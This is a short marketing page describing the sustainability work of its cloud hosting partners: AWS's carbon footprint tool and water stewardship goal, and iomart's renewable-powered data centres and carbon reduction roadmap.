Amazon provides a Customer Carbon Footprint Tool which allows us to monitor our own carbon emissions and how those would compare to running on-premise computing equivalents – cloud computing can be 80% more efficient in this respect.
For further details visit Amazon’s Sustainability in the Cloud section of their site.
It’s not only carbon emissions that AWS monitor, but their water stewardship programme aims to be water positive (that is returning more water to communities than they use) by 2030.
All of iomart’s data centres are powered by 100% renewable energy. They continuously evaluate sites to continue to reduce emissions, such as looking at how waste heat can be turned back into usable power. This project won them the ‘Best Use of Emerging Technology’ from the Digital City Awards in March 2022.
In 2022 iomart developed a Carbon Roadmap to help understand their Scope 1 and 2 GHG emissions, and set carbon reduction targets. They also comply with ISO50001 Energy Management to reduce energy usage.
Further details can be found on iomart’s Environmental, Social & Governance page.
Discover how our team can help you on your journey.Talk to us today